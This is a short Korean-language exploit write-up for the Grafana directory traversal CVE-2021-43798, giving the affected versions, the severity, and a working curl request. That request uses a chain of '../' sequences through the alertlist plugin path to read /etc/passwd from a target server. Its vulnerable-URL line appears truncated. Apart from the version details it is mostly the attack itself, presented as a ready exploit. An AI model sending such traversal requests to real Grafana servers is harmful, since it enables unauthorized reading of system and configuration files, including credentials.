
조작된 HTTP 요청을 통해 승인되지 않은 파일 읽기를 허용하는 Grafana 디렉토리 트래버설(CVE-2021-43798) 익스플로잇입니다.
영향을 받는 버전: Grafana 8.0.0-beta1 ~ 8.3.0 (패치된 버전 제외)
취약점 유형: 디렉토리 트래버설 (Directory Traversal)
영향 심각도: 매우 위험 (Critical)
플랫폼: Grafana (오픈소스 모니터링 및 관찰성 플랫폼)
⚠️ 취약점 세부 정보 Grafana에서 다음 URL을 통해 디렉토리 트래버설이 수행될 수 있습니다:
코드 http://<grafana_host>/public/plugins// 이를 통해 공격자는 서버의 로컬 파일을 읽을 수 있습니다. 예를 들어, /etc/passwd 또는 구성 파일에 무단 접근이 가능합니다.
🔥 익스플로잇 예시 간단한 요청을 통해 파일 읽기:
bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd 위 요청을 통해 Linux 시스템의 사용자 목록을 얻을 수 있습니다.